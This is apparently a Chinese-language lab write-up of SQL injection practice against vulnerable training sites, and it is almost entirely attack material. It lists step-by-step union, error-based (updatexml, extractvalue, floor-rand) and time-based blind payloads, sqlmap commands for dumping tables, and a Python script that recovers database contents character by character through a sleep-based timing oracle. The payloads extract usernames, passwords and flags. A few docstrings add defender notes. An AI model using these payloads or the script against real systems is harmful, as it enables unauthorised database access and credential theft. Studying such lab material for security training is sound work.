
sql注入实战

ε=(´ο`*)))唉,太菜了

sql注入都忘完了

union注入

https://rimovni.exeye.run/hugkudure/well

1.判断注入
name=1' or 1#

2.判断字段
name=1' order by 5#
name=1' order by 6#

3.union查询
name=-1' union select 1,2,3,4,5#

4.查询数据库、表名
name=-1' union select 1,database(),user(),version(),table_name from information_schema.tables where table_schema='twosecu1_vuln_06' limit 0,1#

5.查询列
name=-1' union select 1,database(),user(),version(),column_name from information_schema.columns where table_schema='twosecu1_vuln_06' and table_name='flag' limit 1,1#

6.查字段
name=-1' union select 1,database(),user(),version(),flag from flag limit 0,2#

报错注入

https://rimovni.exeye.run/mefe/login

1.前端验证邮箱
email=1@1.com
password=1

2.post提交,判断注入
email=1' or 1#&password=1

3.判断字段
email=1' order by 3#&password=1
email=1' order by 4#&password=1

4.报错注入
email=1'&password=1

5.爆出数据库
email=1' and updatexml(1,concat(0x7e,database(),0x7e,user()),1)#&password=1
email=1' and extractvalue(1,concat(0x7e,user(),0x7e,database()))#&password=1
email=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,database(),0x7e,user()) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a#&password=1

6.爆当前数据库表
email=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&password=1
email=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#&password=1
email=1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x7e)from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a#&password=1

7.爆字段
email=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='twosecu1_vuln_08' and table_name='user'),0x7e),1)#&password=1
email=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='twosecu1_vuln_08' and table_name='user'),0x7e))#&password=1
email=1' union select 1,2,3 from (select count(*),concat((select concat(column_name,0x7e)from information_schema.columns where table_schema='twosecu1_vuln_08' and table_name='user' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a#&password=1

8.爆数据库内容
email=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from twosecu1_vuln_08.user)),1)#&password=1
email=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from twosecu1_vuln_08.user)))#&password=1
email=1' union select 1,2,3 from (select count(*),concat((select concat(password,0x7e) from twosecu1_vuln_08.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a#&password=1

sql语句注入

https://rimovni.exeye.run/rodka/index

1.爆数据库
select length(database());
select substr(database(),1,16);

2.表总数
select count(table_name) from information_schema.tables where table_schema=database();

3.爆数据库表
select length(table_name) from information_schema.tables where table_schema=database() limit 0,1;
select table_name from information_schema.tables where table_schema = database() limit 0,1;

4.爆字段
select count(column_name) from information_schema.columns where table_name='search';
select column_name from information_schema.columns where table_name='search' limit 0,1;

5.爆内容
select concat(one,"---",two,"---",three,"---",four,"---",five) from search limit 0,1;

union注入

https://rimovni.exeye.run/matihe/index?name=one

python .\sqlmap.py -u https://rimovni.exeye.run/matihe/index?name=one --dbs
python .\sqlmap.py -u https://rimovni.exeye.run/matihe/index?name=one -D 'twosecu1_vuln_04' --tables
python .\sqlmap.py -u https://rimovni.exeye.run/matihe/index?name=one -D 'twosecu1_vuln_04' -T 'workbook' --columns
python .\sqlmap.py -u https://rimovni.exeye.run/matihe/index?name=one -D 'twosecu1_vuln_04' -T 'workbook' -C 'name' --dump
无法爆出数据,可能是过滤了字符“two”
借助sqlmap手动payload
?name=-1' union select 1,user(),3,database()-- -
?name=-1' union select 1,user(),3,table_name from information_schema.tables where table_schema=database() limit 0,1-- -
?name=-1' union select 1,user(),3,column_name from information_schema.columns where table_schema=database() and table_name='workbook' limit 0,1-- -
?name=-1' union select 1,user(),3,node from workbook limit 5,1-- -

盲注

https://rimovni.exeye.run/fe/login

本来是没有发现是什么注入的,然后用Acunetix扫了一下,发现它给出的payload可以执行,默认好像都是用的sleep函数来进行测试的,然后猜测这个页面为时间盲注,但是怎么构造也不能执行sleep,于是借用Acunetix的payload进行注入

/*'+(select(0)from(select(sleep(5)))v)+'*/

最后爆出数据库 twosecu1_vuln_07 ,数据表 word,user ,字段(两张表一样) id,username,password ,以及数据(word只有一行数据,user好像是无数据) ,test,test

1.爆数据库
username=" /*'+(select(1)from(select(sleep(if((length(database())=16),5,0))))v)+'*/&password=1
username=" /*'+(select(1)from(select(sleep(if((ORD(mid(database(),1,1))=116),5,0))))v)+'*/&password=1
twosecu1_vuln_07

2.爆数据库表
username=" /*'+(select(1)from(select(sleep(if(((select count(table_name) from information_schema.tables where table_schema='twosecu1_vuln_07')=2),15,0))))v)+'*/&password=1
username=" /*'+(select(1)from(select(sleep(if((length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=9),15,0))))v)+'*/&password=1
username=\" *'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(table_name) from information_schema.tables where table_schema=database())),%d,1))=%d),15,0))))v)+'*/&password=1
word,user

3.爆字段
uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='user')),%d,1))=%d),15,0))))v)+'*/"&password=1
id,username,password

4.爆数据
uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(id) from twosecu1_vuln_07.word)),%d,1))=%d),15,0))))v)+'*/" %(i,j)
1,test,test

爆数据库

import requests
import time

def login(_username, _password):
    """Submit one login POST and report whether the round-trip was slow.

    main() uses this as a timing oracle: the username it passes carries a
    payload that makes the database sleep when a guessed character is
    correct, so a long response time means "guess confirmed".

    Args:
        _username: value sent as the ``username`` form field.
        _password: value sent as the ``password`` form field.

    Returns:
        True when the request took more than 10 seconds, otherwise False.
    """
    url = "https://rimovni.exeye.run/fe/login"
    form = {
        'username': _username,
        'password': _password,
    }
    print("[+] %s" % url)
    started = time.time()
    requests.post(url, data=form)
    elapsed = time.time() - started
    print("[+] Time: %f" % elapsed)
    # The 10 s threshold matches the sleep() duration requested by the
    # payload built in main().  From the defender's side this is also the
    # tell: a burst of login POSTs that each take ~10 s to answer.
    return elapsed > 10

def main():
    """Recover the current database name one character at a time.

    For each position 1..16 every character of ``ss`` is tried by sending
    it through login(); the payload makes the server sleep(10) only when
    ORD(mid(database(), i, 1)) equals the guess, so a slow login confirms
    the character.  The recovered prefix is printed after each hit.

    Defender note: this costs one ~10 s login request per confirmed
    character, so repeated multi-second POSTs to a login endpoint from one
    client, with quoted/commented usernames, are the pattern to alert on;
    a parameterised query on the server removes the oracle entirely.
    """
    s = ""                      # characters recovered so far
    passwd = "1"
    s_time = time.time()
    # ss = "_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    ss = "_0123456789abcdefghijklmnopqrstuvwxyz"   # candidate alphabet (lower-case only)
    # 16 positions: the earlier length probe reported length(database()) = 16
    for i in range(1,17):
        # for j in range(33, 127):
        for j in ss:
            uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(database(),%d,1))=%d),10,0))))v)+'*/" %(i,ord(j))
            # print(uname)
            b = login(uname,passwd)
            if b:
                s += j
                print("[*] Brup:" + s)
                break               # first slow response wins this position
    e_time = time.time()
    print("[+] Total Time: %f" %(e_time - s_time))

# Entry point: runs the character-by-character recovery described in main().
main()
# twosecu1_vuln_07

# The commented-out payload variants below were swapped into main() to
# recover table names, column names and row data respectively.
# table
# uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(table_name) from information_schema.tables where table_schema=database())),%d,1))=%d),15,0))))v)+'*/" %(i,ord(j))

# column
# uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='word')),%d,1))=%d),15,0))))v)+'*/" %(i,ord(j))

# data
# uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select username from twosecu1_vuln_07.word limit 0,1)),%d,1))=%d),15,0))))v)+'*/" %(i,j)